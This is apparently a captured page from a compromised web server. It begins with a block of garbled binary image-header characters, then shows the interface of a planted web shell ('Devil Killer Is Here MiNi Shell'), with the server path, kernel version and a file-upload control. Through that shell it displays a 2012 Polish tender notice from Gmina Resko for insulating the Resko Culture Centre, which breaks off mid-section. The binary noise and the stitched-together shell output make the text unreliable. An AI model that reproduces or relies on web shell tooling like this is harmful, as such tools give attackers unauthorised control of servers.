JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/102681-N-2012.html

<p class="kh_header"><b>Resko: Termomodernizacja obiektów użyteczności publicznej 
w gminach powiatu łobeskiego 
- 
Zadanie nr 28: Termomodernizacja budynku Centrum Kultury w Resku - Etap II - Wykonanie docieplenia ścian zewnętrznych wraz z wymianą stolarki</b><br>
<b>Numer ogłoszenia: 102681 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Resko , Rynek 1, 72-315 Resko, woj. zachodniopomorskie, tel. 0-91 3951503 w. 37, faks 0-91 3951205.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.resko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja obiektów użyteczności publicznej 
w gminach powiatu łobeskiego 
- 
Zadanie nr 28: Termomodernizacja budynku Centrum Kultury w Resku - Etap II - Wykonanie docieplenia ścian zewnętrznych wraz z wymianą stolarki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	W ramach przedmiotu zamówienia obejmującego roboty budowlane w budynku należy wykonać :
a) wymiana stolarki okiennej i drzwiowej
należy zdemontować istniejące okna drewniane i wymienić na nowe z PCV                 z nawiewnikami w ilości 63 sztuk (182,48 m2) w kolorze czerwono ceglastym, dopasowanym do koloru istniejących drzwi wejściowych. Współczynnik przenikania ciepła (dla całej przegrody) dla nowej stolarki nie wyższy niż U = 1,9 W/m2K (a=3 profil trójkomorowy, szyba zespolona). Wykonać również należy demontaż istniejących parapetów i montaż parapetów wewnętrznych z PCV i zewnętrznych z blachy powlekanej w kolorze stolarki.
Należy zachować istniejący podział okien oraz tą samą ilość otwieranych skrzydeł zgodnie z istniejącą stolarką okienną,
Wszystkie okna należy wykonać jako rozwieralne w tym jedno największe skrzydło rozwieralno-uchylne,
Istniejące luksfery należy zdemontować i wstawić nowe luksfery satynowe, gładkie w kolorze jasny brąz o wymiarach 19 cm x 19 cm o współczynniku przenikania ciepła nie wyższy niż U = 1,9 W/m2K i o całkowitej powierzchni 7,13 m2.
Należy zdemontować istniejące drzwi i wymienić na nowe z PCV w ilości 3 sztuk (7,9 m2) w kolorze dopasowanym do istniejącej stolarki drzwiowej. Istniejące drzwi     z PCV nie podlegają wymianie.



Przy wymianie stolarki okiennej i drzwiowej należy wykonać prace wykończeniowe, polegające na położeniu tynku na mokro i dwukrotnym pomalowaniu wykonanych powierzchni obróbek stolarki okiennej i drzwiowej.

b) docieplenie ścian zewnętrznych
polega na wykonaniu ocieplenia ścian o powierzchni 825,80 m2 styropianem o gr. 14 cm (EPS-040 FASADA, lambda=0,040 W/mK). Należy również uwzględnić wykończenie przy elewacji powierzchni 84,60 m2 ościeży styropianem gr. 3 cm (lambda=0,040 W/mK) oraz docieplenie ścian fundamentowych o powierzchni 150,00 m2, na 1 m poniżej poziomu terenu styropianem gr. 10 cm (lambda=0,040 W/mK). Kolorystykę elewacji wykonać zgodnie z projektem budowlanym, lecz zastosować farbę silikonową. Technologię docieplenia ścian zewnętrznych należy wykonać metodą wskazaną w projekcie budowlanym.
Wykonać demontaż istniejących i montaż nowych rynien o dł. 140 m, rur spustowych o dł. 75 m oraz czyszczaków 10 szt. w kolorze siwym, a także uwzględnić wykonanie nowych obróbek blacharskich z blachy powlekanej w kolorze siwym. Należy zdemontować i zamontować instalację odgromową - wykonać badania elektryczne instalacji odgromowej. 
Dach nad wejściem głównym - zerwanie papy, wykonanie szlichty betonowej, położenie nowego pokrycia z papy termozgrzewalnej (25,0 m2), wykonanie obróbek blacharskich przy łączeniu daszku z budynkiem oraz orynnowania, demontaż istniejących i montaż nowych rynien o dł. 14,0 m, rur spustowych o dł. 6,0 m.

c) dodatkowo
- przy wejściu głównym należy skuć płytki z ścian (wszystkie) oraz tynk (przed drzwiami głównymi z prawej strony) a następnie położyć styropian i tynk silikonowo - żywiczny w kolorze elewacji do wysokości 1,5 m.
 - budynek CK Resko będzie docieplony tylko w części - wyłączone z docieplenia jest mieszkanie prywatne znajdujące się w budynku CK Resko, które zostało przedstawione w projekcie budowlanym - dlatego w miejscach gdzie elewacja wykonana będzie tylko w części (nie na całej powierzchni ściany) należy te miejsca zabezpieczyć - wykonać obróbki blacharskie nad ocieploną ścianą w kolorze siwym;
- wykonać zabezpieczenie wyposażenia pomieszczeń folią ochronną;
 - uporządkować teren wokół budynku po zakończeniu prac budowlanych, teren doprowadzić do stanu z przed wejścia na roboty budowlane, szczególną uwagę zwrócić na nasadzenia oraz zagospodarowanie terenu wzdłuż elewacji wschodniej; 
- zdemontowane, na czas wykonywanych prac, tablice informacyjne znajdujące się na budynku a następnie ponownie zawiesić;
- wszystkie kable znajdujące się na elewacji po zakończeniu prac przymocować do ścian;
- czujniki i inne elementy instalacji (np. gazowej) zdemontować i zamontować ponownie po wykonanych pracach budowlanych,
- skrzynkę elektryczną (strona południowa) pomalować w kolorze elewacji,
- odkuć luźne tynki a następnie uzupełnić braki w tynkach oraz pomalować słupy ozdobne przed wejściem głównym,
- pomalować strop daszku nad wejściem głównym,
- odkuć luźne tynki a następnie uzupełnić braki w tynkach,
- wykonać opaskę przy elewacji budynku o szerokości 0,5 m zakończoną obrzeżem betonowym i uzupełnionym grysem barwy ciemnej (148 m),

- odkuć luźne tynki a następnie uzupełnić braki w tynkach oraz pomalować komin, 
- dach budynku nie podlega dociepleniu (docieplenie wykonane),
- istniejące krany (elewacja wschodnia) przedłużyć o grubość nowej elewacji,
- przerobić przyłącze wody (strona południowa), istniejące przyłącze ocieplić              i  zainstalować w bruzdach ściany zewnętrznej budynku.

2) 	Szczegółowy opis przedmiotu zamówienia zawiera SIWZ, Przedmiar Robót - załącznik nr 8 do SIWZ, Specyfikacja Techniczna Wykonania i Odbioru Robót - załącznik nr 9 do SIWZ oraz Projekt Budowlany - załącznik nr 10 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.32.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 10.000,00 zł 
(słownie: dziesięć tysięcy zł i zero groszy)

1.	Wadium w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: 
Bank : Bank Spółdzielczy w Gryficach oddział Resko
Nr rachunku : 91 9376 0001 0050 6515 2003 0007 
z dopiskiem na blankiecie przelewu: 
Wadium na zabezpieczenie oferty przetargowej Zadania nr 28 - Termomodernizacja budynku Centrum Kultury w Resku - Etap II - 
Wykonanie docieplenia ścian zewnętrznych wraz z wymianą stolarki

2.	Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
3.	Wadium może być wnoszone w formie: poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, które należy w formie oryginału załączyć do oferty.
4.	Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy P.z.p.
5.	Treść gwarancji wadialnej musi zawierać następujące elementy:
a)	nazwa i adres Zamawiającego;
b)	określenie przedmiotu zamówienia;
c)	nazwę i adres Wykonawcy.
6.	Wadium musi być wniesione nie później niż do wyznaczonego terminu składania ofert.
7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania,         a jego oferta zostanie odrzucona.
9.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
10.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do wnoszenia.
11.	Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w sytuacji, jak w pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
12.	W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie wykonawców, pod rygorem wykluczenia             z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.

13.	Zatrzymanie wadium nastąpi w okolicznościach :
a) jeżeli Wykonawca w odpowiedzi na wezwanie, o  którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw,
b)  jeżeli Wykonawca w odpowiedzi na wezwanie złożył wymagane oświadczenia lub dokumenty, ale z treści ich nie wynika, że Wykonawca spełnia warunki udziału w postępowaniu,
c) jeżeli Wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
d) jeżeli Wykonawca był zobowiązany i nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
e) jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe      z przyczyn leżących po stronie wykonawcy.
14.	Zamawiający nie zatrzyma wadium, jeżeli Wykonawca w odpowiedzi na wezwanie złożył wymagane oświadczenia lub dokumenty, ale z treści ich nie wynika, że Wykonawca spełnia warunki udziału w postępowaniu,  pod warunkiem że udowodni, że złożenie innych dokumentów nie jest możliwe i nie wynika to z przyczyn leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) wykonanie minimum jednej roboty budowlanej polegającej na dociepleniu ścian zewnętrznych budynku styropianem o łącznej powierzchni minimum 800 m2, a także przedstawi wykaz ww. robót z podaniem ich rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych dokumentów i oświadczeń, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować co najmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej określonymi przepisami ustawy - prawo budowlane oraz wskaże podstawę do dysponowania tymi osobami. Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych dokumentów i oświadczeń, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 500 000,00 zł (słownie: pięćset tysięcy zł 00/100),
2) Wykonawca posiada środki finansowe lub dostęp do środków finansowych w postaci kredytu w wysokości co najmniej 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy zł 00/100).
Ocena spełniania warunku udziału w postępowaniu nastąpi na podstawie złożonych dokumentów i oświadczeń, na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony załącznik nr 1 - Formularz Ofertowy Wykonawcy.
2)	W przypadku wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo do reprezentowania ich w prowadzonym postępowaniu                 o udzielenie zamówienia albo do reprezentowania w prowadzonym postępowaniu    i zawarcia umowy w sprawie zamówienia publicznego, 
3)	Kopia dowodu wniesienia wadium, jeżeli zostało wniesione w pieniądzu (kopia potwierdzenia przelewu), lub oryginał jeżeli zostało wniesione w innej formie.
4)	Harmonogram rzeczowo - finansowy realizacji i rozliczania wykonanych robot opracowany według wytycznych określonych w rozdz. 4 pkt 5 ppkt 6.
5)	Kosztorys ofertowy opracowany metodą uproszczoną wraz z zestawieniem cen jednostkowych materiałów, czynników produkcji tj. stawka rbh, kosztów pośrednich, kosztów zaopatrzenia i zysku oraz stawki jednostkowej pracy podstawowego sprzętu i urządzeń, które Wykonawca będzie używał do wykonania przedmiotu zamówienia. 
Kosztorys ofertowy ma być sporządzony z podaniem wartości poszczególnych zakresów prac dla Zadania nr 28 - Termomodernizacja budynku Centrum Kultury w Resku - Etap II - Wykonanie docieplenia ścian zewnętrznych wraz z wymianą stolarki, tj.:
a)	docieplenie ścian zewnętrznych,
b)	wymiana stolarki okiennej, 
c)	wymiana stolarki drzwiowej;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2)	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3)	Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
                                
    I.  Zmiana okresu przewidzianego na ukończenie robót:
1)	 zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a)	klęski żywiołowe;
b)	warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
2)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,    w szczególności:
a)	wstrzymanie robót przez Zamawiającego;
b)	nieterminowe przekazanie placu budowy przez Zamawiającego, gdy opóźnienie to ma wpływ na terminowe wykonanie przedmiotu umowy;
c)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót;
d)	zmiany będące następstwem działania organów administracji i innych podmiotów o kompetencjach zbliżonych do organów administracji,                   w szczególności eksploatatorów infrastruktury oraz właścicieli gruntów pod inwestycję, w tym:
-	przekroczenie zakreślonych przez prawo lub regulaminy, a jeśli takich
regulacji nie ma - typowych w danych okolicznościach, terminów
wydawania przez organy administracji lub inne podmioty decyzji,
zezwoleń, uzgodnień itp.;
   - odmowa wydania przez organy administracji lub inne podmioty
wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych
przez Wykonawcę, w tym odmowa udostępnienia przez właścicieli
nieruchomości do celów realizacji inwestycji;
3) zmiany spowodowane koniecznością wykonania zamówienia dodatkowego,          w rozumieniu przepisów o zamówieniach publicznych, którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy.

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej, termin okresu przewidzianego na ukończenie robót może ulec odpowiedniemu przedłużeniu,     o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

II.	Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych, w szczególności następującymi okolicznościami:
